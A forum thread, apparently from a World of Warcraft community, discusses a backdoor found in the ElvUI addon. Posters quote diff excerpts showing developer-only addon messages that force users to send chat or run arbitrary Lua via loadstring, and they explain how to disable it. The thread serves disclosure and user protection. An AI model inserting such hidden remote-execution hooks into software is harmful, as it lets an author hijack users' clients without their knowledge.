ElvUI Backdoor Warning (though I'm personally not too fussed)

[The Stig]

From reddit: http://www.reddit.com/r/wow/comments..._to_remove_it/

So last night in LFR, a lot of people(myself included) randomly started following one person and posting random things in instance chat like 'this is elv' etc. After LFR i decided to have a look at the ElvUI code and discovered the author actually put a backdoor in it enabling her to post messages to ANY channel and execute ANY console command on behalf of ElvUI users. Below is a screenshot of the elvui core.lua:
http://imgur.com/WYVJplW
Basically the author has flagged her three characters as devAlts (see red outlined code).
The first block of blue outlined code checks for "devAlts[sender] == true" ie a devAlt is sending the command and "devAlts[myName] ~= true" ie a devAlt is NOT recieving the command then SendChatMessage(msg, channel, nil, sendTo) ie sends a chat message to any channel she wants
The second block of blue code similarly is able to execute whatever console commands she wants to force a user to run.
This is potentially very dangerous, potentially could 'kick' anyone with elvUI she wants from lfg groups, disband guilds etc. There is no need for such a backdoor and the fact devAlts are specifically excluded from being targetted by this system is dodgy. I haven't looked through the rest of the code to determine if the UI is able to access anything other than console or chat but this is really dangerous having a backdoor in a UI so many players use.
To disable this, you must goto your wow install directory\interface\addons\elvUI\core\core.lua, ctrl+F find 'Elv-ShatteredHand' and delete all three entries under devAlts so that function should now look like
local devAlts = {
}
while this doesnt disable the backdoor fully, it ensures no one is able to make use of it. I really hope in the future addon authors(and programmers in general) can refrain from placing these backdoors in their code. they serve no legitimate purpose and is generally irritating to remove

The people going crazy about it though are quite hilarious. I don't actually think it's a big deal but in case you're paranoid you can download the latest version (if you haven't rage-abandoned the addon already) with the code removed.

[Meresgi]

I get the reasoning behind it, but that said it's still a really bad idea to do that especially if you don't make note of it somewhere, like during the install for people.

If they want to test it, you make a beta copy of the code, put the backdoor in and then give to people who know it has a backdoor, you don't release public code with a backdoor like that lol...

Git:

http://git.tukui.org/Elv/elvui/commi...0f3d0536.patch

Comment for this:

- if (user ~= 'ALL' and user == E.myname) or user == 'ALL' then
- SendChatMessage(msg, channel, nil, sendTo)
+ elseif (prefix == 'ElvSays' or prefix == 'ElvCommand') and ((sender == 'Elvz' and E.myrealm == "Spirestone") or find(sender, "Elvz%-Spirestone")) then ---HAHHAHAHAHHA
+ if prefix == 'ElvSays' then
+ local user, channel, msg, sendTo = split(',', message)
+
+ if (user ~= 'ALL' and user == E.myname) or user == 'ALL' then
+ SendChatMessage(msg, channel, nil, sendTo)

Also this:

self:RegisterChatCommand('cleanguild', 'MassGuildKick')

[aurik]

The cleanguild command is something else that just exists in the addon.

[Meresgi]

The cleanguild command is something else that just exists in the addon.

function E:LoadCommands()
self:RegisterChatCommand("in", "DelayScriptCall")
self:RegisterChatCommand("ec", "ToggleConfig")
self:RegisterChatCommand("elvui", "ToggleConfig")

self:RegisterChatCommand('bgstats', 'BGStats')
self:RegisterChatCommand('aprilfools', 'DisableAprilFools')
self:RegisterChatCommand('luaerror', 'LuaError')
self:RegisterChatCommand('egrid', 'Grid')
self:RegisterChatCommand("moveui", "ToggleConfigMode")
self:RegisterChatCommand("resetui", "ResetUI")
self:RegisterChatCommand("enable", "EnableAddon")
self:RegisterChatCommand("disable", "DisableAddon")
self:RegisterChatCommand('farmmode', 'FarmMode')
self:RegisterChatCommand('devsays', 'DevSays')
self:RegisterChatCommand('devchannel', 'DevChannel')
self:RegisterChatCommand('devcmd', 'DevCommand')
self:RegisterChatCommand('devtarget', 'DevTarget')
self:RegisterChatCommand('cleanguild', 'MassGuildKick')
if E.ActionBars then
self:RegisterChatCommand('kb', E.ActionBars.ActivateBindMode)
end
end

These commands are all in the basic core/commands.lua file, if you can send text to someone's chat, I would assume you can also send commands (could be wrong). He states he could use it to reset configs on the UI remotely.

I know /aprilfools does stop the APRIL_FOOLS function from working, so I can only assume /cleanguild would run it's function.

[aurik]

The problem code is this:

+ local user, executeString = split(',', message)
+ if (user ~= 'ALL' and user == E.myname) or user == 'ALL' then
+ local func, err = loadstring(executeString);
+ if not err then
+ func()
+ end
+ end

The existence of the cleanguild function is immaterial because this snippet already grants full access to run any lua string